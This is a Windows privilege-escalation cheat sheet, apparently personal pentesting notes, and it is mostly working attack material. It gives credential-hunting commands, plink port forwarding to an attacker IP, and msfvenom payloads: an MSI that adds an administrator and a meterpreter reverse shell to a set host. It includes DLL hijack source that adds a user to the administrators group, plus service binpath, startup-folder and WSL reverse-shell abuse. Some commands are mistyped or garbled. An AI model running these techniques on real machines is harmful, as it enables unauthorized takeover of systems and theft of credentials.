Windows Privilege Escalation CheatSheet and Notes

• By: Vedant Bhalgama (ActiveXSploit)

Automated tools to use for local enumeration as soon as you gain a shell.

```
==> WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-
scripts-suite/tree/master/winPEAS

==> Windows Exploit Suggester: https://github.com/bitsadmin/wesng

==> Windows Privilege Escalation CheckList:
https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

==> Metasploit Local Exploit Suggester

==> SharpUp: https://github.com/GhostPack/SharpUp

==> PowerUp:
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
```

Kernel Exploits

```
Kernel exploits are very much common if the system is way too old.
To check for these kind of vulnerabilities, Attacker may either do some system enumeration. And look up for exploits locally.

==> systeminfo | findstr /B /C:"OS Name" /B /C:"OS Version"
==> Use automated tools for finding vulnerabilities
==> Use Metasploit's exploit suggester to look for vulnerabilities and their corresponding exploits
```

Password Hunting and Port Forwarding

```
People usually leave passwords in a txt file locally on the system, Attacker can enumerate for these kind of password text files on the system and try to escalate privileges on the system.

==> findstr /si password \*.xml \*.ini \*.txt \*.config
```

```
==> findstr /spin "password" *.*
==> dir /s \*sysprep.inf \*sysprep.xml \*unattended.xml \*unattend.xml
\*unattend.txt 2>nul

==> req query HKLM /f password /t REG_SZ /s
Port Fowarding can be used to expose any vulnerable service running locally on the target system, Applications such as plink, ssh and etc. can be used to port forward the running internal services to the attacker machine

https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

==> plink.exe -l root -pw <passwordhere> -R 1234:127.0.0.1:1234 <attacker ip>
```

Windows Subsystem for Linux

```
Windows Subsystem for linux, also known as WSL, can also be a way we can privilege escalate, Whenever you get initial access on a windows machine. Look for file called wsl.exe or bash.exe. WSL also contains vulnerabilities and can be a vector for privilege escalation on Windows.

==> Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`

==> Alternatively you can explore the `WSL` filesystem in the folder

C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindo ws_79rhkplfndgsc\LocalState\rootfs\

==> wsl whoami

==> ./ubuntun1604.exe config \--default\-user root

==> wsl whoami

==> wsl python \-c 'BIND\_OR\_REVERSE\_SHELL\_PYTHON\_CODE'
```

Token Impersonation Attacks

Privilege Escalation by getsystem

RunAs

RunAs is a utlity in windows which allows to run commands as a different user
when logging in. This can be a vector of Privilege Escalation too! But ofc, we
need the damn credentials for it!
use a command called "cmdkey /list" to list all the stored passwords on the
machine. As you get the stored passwords, Just use this runas command:
 - C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred
"C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt >
C:\Users\security\root.txt"

AutoRun PrivEsc

==> Command mentioned below to open the AutoRuns64.exe file through which we can check if there are any files which are automatically running.

Command : C:\Users\Desktop\Tools\Autoruns\Autoruns64.exe

==> The next command is going to list if we have Read, Write and Execute perms of a particular program which was found in autoruns, If we have the suffcient privileges to do so, We can replace the file and get administrator shell as soon as a administrator login to the machine.

Command : C:\\Users\\User\\Desktop\\Tools\\Accesschk\\accesschk64.exe -wvu

Always Install Elevated

==> Always Install Elevated is an policy in Windows which allows installation of .msi files (Windows Installer Files) with elevated privileges for non-admin users. This policy is enabled in Group Policy Editor. This can lead to a high security risk, An attacker can install a malicious .msi file or do something more if the AlwaysInstallElevated is enabled in the Group Policy Editor.

Run this command to check whether the AlwaysInstallElevated policy is enabled or not:

- reg query HKCU\Software\Policies\Microsoft\Windows\Installer
- reg guery HKLM\Software\Policies\Microsoft\Windows\Installer

As soon as you run the command and if you see something like this:

AlwaysInstallElevated REG DWORD 0x1

It means that the policydir

is enabled, But if you see a 0 instead of 1 at last, It means that the policy

```
is disabled.

To abuse with this misconfiguration, We can run the following command in powershell:

    - Write-UserAddMSI (This only works if PowerUp exists)
    - Add a new user to windows using the net user command (ex. net user user)
    - msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi > file.msi
    - Execute the file.msi using msiexec: msiexec /quiet/ qn /i file.msi
```

Service Escalation - Registry

```
#include <windows.h>
#include <stdio.h>

#define SLEEP_TIME 5000

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);

//add the payload here
```

Service Escalation - Executable Files

```
If there is an executable file running as an service, We can exploit that to gain higher privileges on the system.

We can abuse those services!
```

```
Verify the particular binary if "Everyone" user group has "FILE_ALL_ACCESS".

--> C:\\Users\\User\\Desktop\\Tools\\Accesschk\\accesschk64.exe -wvu
"C:\\Program Files\\File Permissions Service"

Now, We can either generate a reverse shell, or maybe just execute any other system command, I am going to stick with a reverse shell,

--> msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.1
lport=4444 -f exe -o shell.exe

Transfer the file to the target machine, Replace it with the file executable file used by the service. After replacing it, Run this command:

--> sc start filepermsvc (it can be any service by which the executable is associated with)
```

Escalation via StartUp Applications

```
--> StartUp Applications can be a vector of privilege escalation too! StartUp applications on Windows are nothing but you just give it an application to run whenever the system is rebooted.

--> In order to escalate, We need to have full control over the StartUp Directory (C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup)

--> To check whether we have full access over the StartUp Directory, We have to run the following command:

--> icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

--> If the command output shows "BUILTIN\Users" group has full access to the directory "(F)". To exploit the misconfiguration, We can generate a reverse shell and paste it into the "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" directory.

--> Let a high privilege user or Administrator reboot and login, As soon as he/she login, You should get a reverse connection!
```

DLL Hijacking Escalation

```
==> DLL stands for "Dynamic Link Library". DLL's contains classes, functions,
   etc. DLL's run with executable files, They run under a parent process.
   While Windows is starting up applications, It looks up for DLL files for
   it, Now, The main flaw here is that if the DLL File path doesn't exist, And
   that Path is Writable, We can escalate our privileges! How? Here's the way

Following is the DLL Code, Compile the code:
```

```
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o
output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o
output.dll

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net localgroup administrators user /add");
        ExitProcess(0);
    }
    return TRUE;
}
```

After the DLL is compiled, Transfer it to the target Windows Machine, And move it to the path which you found before where the original DLL file is missing. Make sure you have the permissions to write files in the particular folder which you found. Restart the DLL Service, And your user should be added in the administrators group!

Service Escalation - Binary Path

```
Command to check whether we have RW access over any binary on the system.

==> accesscheck64.exe -uwcv Everyone *

After you get the results, You can look up for that specific binary for more information: If the user has 'SERIVCE_CHANGE_CONFIG' permission, Escalation can be performed.

==> accesscheck64.exe -uwcv <binaryname>
```

```
To escalate privileges, We can now change the Binary Path of the binary, To do so, We can query the binary:

==> sc qc <binaryname>
==> sc config <binaryname> binpath= "net localgroup administrators user /add"

Now, restart the service, it might pop up an error, but ignore it and check if you sucessfully escalated.

==> net localgroup administrators
```

Service Escalation - Unquoted Service Path

```
==> If there is a path on the Windows Machine, Which has spaces in it and there are no quotes, That can be a big issue and can be an escalation vector!

==> Run PowerUp.psl or any other automated tool to identify if there is any Unquoted Service Path.

==> Run the following commmand to see if the Service Path is running with SYSTEM_PRIVILEGES:

--> sc qc <servicename>

==> Next, Check if it the current user has "Write" Privileges in the Service Path Directory:

--> accesschk.exe -uwd "pathtoservicehere"

==> If we have Write Privileges, We can move forward to move the Executable file to the path and replace it or else put the pathname.exe. Restart the service and you should escalate
```